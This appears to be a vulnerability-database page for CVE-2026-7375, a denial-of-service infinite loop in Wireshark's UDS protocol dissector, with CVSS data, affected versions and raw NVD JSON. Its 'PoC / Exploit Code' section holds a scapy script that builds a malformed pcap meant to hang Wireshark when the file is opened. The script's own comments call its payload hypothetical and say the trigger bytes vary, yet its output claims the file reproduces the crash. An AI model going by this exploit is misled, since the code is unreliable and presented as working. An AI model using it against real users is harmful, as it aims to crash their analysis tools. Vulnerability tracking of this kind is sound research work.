Security Vulnerability Report
中文
CVE-2026-7375 CVSS 5.5 MEDIUM

CVE-2026-7375

Published: 2026-04-30 06:16:17
Last Modified: 2026-05-01 19:00:59

Description

UDS protocol dissector infinite loop in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
Wireshark 4.6.0 to 4.6.4
Wireshark 4.4.0 to 4.4.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-7375 (Wireshark UDS Dissector Infinite Loop DoS) This script generates a pcap file with a malformed UDS packet structure. Opening the generated file in vulnerable Wireshark versions triggers the infinite loop. """ from scapy.all import * import sys def generate_poc(filename): # Crafting a raw packet that simulates a UDS (ISO-TP on TCP) stream # Note: The specific byte sequence triggering the loop varies by vulnerability details. # This payload is structured to potentially confuse length checks in dissectors. # Hypothetical malformed UDS payload # 0x22 (ReadDataByIdentifier) followed by data that might confuse the parser loop malicious_payload = bytes.fromhex("22F1860102030405060708090A0B0C0D0E0F") # Encapsulate in Ethernet/IP/TCP to simulate a network capture # Using a common port for diagnostic traffic or raw TCP ether = Ether(dst="00:11:22:33:44:55", src="66:77:88:99:aa:bb") ip = IP(src="192.168.1.10", dst="192.168.1.20") tcp = TCP(sport=50000, dport=13400, flags="PA", seq=1000, ack=2000) # Assemble the packet pkt = ether / ip / tcp / Raw(load=malicious_payload) # Save to pcap wrpcap(filename, [pkt]) print(f"[+] PoC file '{filename}' generated successfully.") print(f"[+] Open this file in Wireshark 4.6.0 - 4.6.4 to reproduce the DoS.") if __name__ == "__main__": generate_poc("cve_2026_7375_poc.pcap")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7375", "sourceIdentifier": "[email protected]", "published": "2026-04-30T06:16:16.927", "lastModified": "2026-05-01T19:00:59.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "UDS protocol dissector infinite loop in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.15", "matchCriteriaId": "8EAFFA8A-B5D8-4784-851E-E1B682871495"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.5", "matchCriteriaId": "1D804272-AD4D-4454-9629-1BBAA825D7C4"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/work_items/21225", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2026-50.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}